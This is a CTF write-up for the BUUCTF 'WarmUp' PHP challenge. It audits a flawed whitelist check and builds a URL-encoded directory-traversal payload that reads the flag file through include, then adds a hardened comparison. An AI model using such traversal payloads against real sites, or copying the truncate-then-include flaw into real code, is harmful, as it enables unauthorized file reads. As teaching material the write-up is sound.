BUUCTF web WarmUp
2022-07-19 05:20:00 【dafeng2773】
Challenge link: BUUCTF online judge (buuoj.cn)
Open the challenge link and you are greeted by a big smiley face.

First press F12 and look at the page source; it hints at source.php.
Visit source.php.

It contains source.php and hint.php; visit hint.php.

The guess is that the flag is in ffffllllaaaagggg.
Looking at the code in source.php and the emoji link, the challenge is presumably testing code auditing and directory traversal.

Code audit
<?php
highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) { // is the variable set, and is it a string?
            echo "you can't see it";
            return false;
        }

        if (in_array($page, $whitelist)) { // does it match the whitelist directly?
            return true;
        }

        $_page = mb_substr( // take the part before the first '?'
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) { // second whitelist check
            return true;
        }

        $_page = urldecode($page); // URL-decode $page
        $_page = mb_substr( // again take the part before the first '?'
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) { // third whitelist check
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

if (! empty($_REQUEST['file']) // not empty
    && is_string($_REQUEST['file']) // is a string
    && emmm::checkFile($_REQUEST['file']) // passes the check
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
Look at the main body first: the file parameter goes through three checks: 1. it is not empty; 2. it is a string; 3. it passes the checkFile function. Only when all three pass is it handed to include.
The checkFile function:
1. First sets a whitelist that contains only source.php and hint.php.
2. Checks $page: the part of page before the first ? is compared against the whitelist.
3. Since URL encoding is accepted, it URL-decodes $page once and checks the part before the first ? again.
Note that every whitelist comparison is made against the truncated copy $_page, while include still receives the full, untruncated $page.
Try constructing a payload:
file=source.php?../../../../../ffffllllaaaagggg
Something goes wrong: there is a URL-encoding problem.
Change ? to %3F and construct the payload:
file=source.php%3F../../../../../ffffllllaaaagggg
This succeeds and returns the flag.

For code-audit challenges, first understand the code, then construct the corresponding payload.
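As an added example (not part of the original write-up), the checkFile() logic above is reproduced beside a hardened variant that returns the whitelisted entry itself, so the include path is never user-controlled; it shows that the traversal string passes the original check because only its truncated copy is compared, while the hardened version rejects it. The input list is constructed.

```php
<?php
// Added example, not from the original write-up: the original checkFile()
// logic reproduced as-is next to a hardened variant, run on constructed inputs.
// Requires the mbstring extension, as the original does.

$whitelist = ["source" => "source.php", "hint" => "hint.php"];

// Original logic. The whitelist is matched against a truncated copy
// ($_page); the caller then passes the untruncated $page to include.
function checkFileOriginal(string $page, array $whitelist): bool
{
    if (in_array($page, $whitelist, true)) {
        return true;
    }
    $_page = mb_substr($page, 0, mb_strpos($page . '?', '?'));
    if (in_array($_page, $whitelist, true)) {
        return true;
    }
    $_page = urldecode($page);
    $_page = mb_substr($_page, 0, mb_strpos($_page . '?', '?'));
    return in_array($_page, $whitelist, true);
}

// Hardened variant: require an exact whitelist match and return the
// whitelisted entry itself, so the include path is never user-controlled.
function resolvePage(string $page, array $whitelist): ?string
{
    $key = array_search($page, $whitelist, true);
    return $key === false ? null : $whitelist[$key];
}

// Constructed inputs as they appear in $_REQUEST['file'] (PHP has already
// decoded %3F to '?' once by the time the script sees them).
$samples = [
    "source.php",
    "hint.php",
    "source.php?../../../../../ffffllllaaaagggg",
];
foreach ($samples as $input) {
    $orig = checkFileOriginal($input, $whitelist) ? "accepted" : "rejected";
    $hard = resolvePage($input, $whitelist) ?? "rejected";
    printf("%-48s original: %-8s hardened: %s\n", $input, $orig, $hard);
}
```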
References:
buuctf-[HCTF 2018]WarmUp1 (Xiaoyute's detailed explanation), Xiaoyute's blog, CSDN
BUUCTF web WarmUp, A_dmins's blog, CSDN